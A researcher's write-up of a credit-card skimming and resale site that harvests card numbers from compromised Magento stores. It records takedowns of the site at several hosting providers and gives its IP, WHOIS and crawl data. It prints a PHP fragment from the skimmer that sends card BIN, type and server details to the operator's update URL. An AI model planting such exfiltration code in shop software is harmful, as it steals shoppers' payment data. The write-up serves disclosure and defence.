ontools.net research
06-06-2017
on 06-28-2017 I completed my research and alerted the hosting provider to the malicious site, they removed the site so it no longer poses a threat.
on 12-09-2017 After finding a new hosting provider and re-setting up, I was able to alert the new provider and he's been suspended again.
on 03-20-2018 After finding a new hosting provider and re-setting up, I was able to alert the new provider and he's been suspended for a third time.
In June of 2017 while researching a compromised website, I came across ontools.net in a snippet of bad code. after doing some investigative work, I discovered the website is used to automatically and manually collect credit card numbers, then used as a resell market where someone can purchase the card numbers using bitcoin and Perfect Money.
I signed up for the site and began to explore a bit. It's appears it's well developed, but incomplete, many of the features listed simply don't work or are missing. I didn't attempt to purchase any cards because, you know, felonies so I can't confirm that it's actually working, but they do have a pretty extenstive list of cards available in their store.
below I've included their code snippet, a few things I discovered on their site, and screenshots of the app.
Code Snippets$update = "http://magento.ontools.net/update";$binCC = substr($data['cc_number'], 0, 6); $subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName; $xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];Noteable data
IP: 188.241.58.16 Host: thcservers.com Cpanel: http://ontools.net:2082WHO IS data
Domain Name: ONTOOLS.NET Registry Domain ID: 1990106061_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2016-01-08T15:55:13.00Z Creation Date: 2015-12-28T15:53:37.00Z Registrar Registration Expiration Date: 2018-12-28T15:53:37.00Z Registrant Name: WHOIS AGENT Registrant Organization: WHOIS PRIVACY PROTECTION SERVICE, INCCrawl Data
/ /member.php /register.php /resetpass.php /icq:699623489 /assets /assets/css /assets/css/main-style.css /assets/css/style.css /assets/css/styles.css /assets/js /assets/js/cekpass.js /assets/js/jquery-1.3.2.min.js /assets/js/jquery.backgroundPosition.js /assets/js/marquee.js /assets/img /assets/img/background.gif /assets/img/foreground.png /assets/img/logo.png /assets/img/midground.png /assets/img/user.jpg /assets/plugins /assets/plugins/bootstrap/ /assets/plugins/dataTables/ /assets/plugins/flot/ /assets/plugins/jquery-1.10.2.js /assets/plugins/metisMenu/ /assets/plugins/morris/ /assets/plugins/pace/ /assets/plugins/social-buttons/ /assets/plugins/timeline/ /assets/scripts /assets/scripts/dashboard-demo.js /assets/scripts/flot-demo.js /assets/scripts/morris-demo.js /assets/scripts/siminta.js /assets/font-awesome /assets/font-awesome/css/ /assets/font-awesome/fonts/Screen Shots










